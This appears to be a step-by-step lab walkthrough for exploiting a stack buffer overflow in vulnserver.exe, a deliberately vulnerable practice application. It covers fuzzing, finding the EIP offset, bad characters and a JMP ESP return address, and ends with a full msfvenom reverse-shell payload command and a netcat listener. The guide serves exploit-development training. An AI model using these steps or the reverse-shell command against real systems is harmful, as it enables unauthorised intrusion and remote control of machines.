### SPIKING:
1. Use the ```spike.spk``` script to find the vulnerable command on the vulnserver.exe application.
2. Once you find out the vulnerable command, proceed to fuzzing.

### FUZZING:
3. After finding out the vulnerable command, use the ```fuzz.py``` script to know how much bytes it would take to crash the application.

### FINDING THE OFFSET:
4. Use ```/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l byte_size```  to generate characters with the specified size.
5. Copy the generated characters and change the value of the "offset" variable on the ```finding_offset.py``` script.
6. Now launch the attack and take note of the EIP register value.
7. So now, identify the offset by using the tool ```/usr/share/metaploit-framework/tools/exploit/pattern_offset.rb -l byte_size -q EIP_VALUE```.
8. It means that after on the generated bytes generated by the pattern_offset.rb tool, we can control the EIP register.

### OVERWRTING THE EIP:
9. Use the ```overwriting_the_eip.py``` script to verify that you controlled the EIP register.

### FINDING BAD CHARACTERS
10. Find the bad characters list on https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/
12. Use ```finding_bad_characters.py``` script and launch.
13. Select the ESP register and follow the HEX DUMP. Then follow the HEX DUMP and find for any misplaced numbers there and remove that from the ```bad_chars``` variable on the ```finding_bad_characters.py``` script.

### FINDING THE RIGHT MODULE
14. Download the mona-py module and import on On Immunity Debugger. Find mona modules by searching ```!mona modules``` on Immunity Debugger.
15. Convert the assembly language of ```JMP ESP``` cmd to HEX Code using ```nasm_shell```.
16. Find the right module by inspecting if there were a memory protection on it and it comes with the target program.
If so, type ```find -s HEX_CODE_EQUIVALENT_OF_JMP_ESP_CMD \xmodule_name``` on Immunity Debugger.
17. Keep track of the return addresses and try it on the exploit one by one by replacing the ```return_address``` variable writing in REVERSE ORDER.
18. Go to immunity and search for the return address to find the JMP ESP instruction and set a breakpoint (F2).

# GETTING ROOT
19. Generate a shellcode by  ```msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00" ```. Take note that bad characters should be replaced via the ```-b``` parameter.
20. Fire up the netcat listener and hit that ```getting_root.py``` script!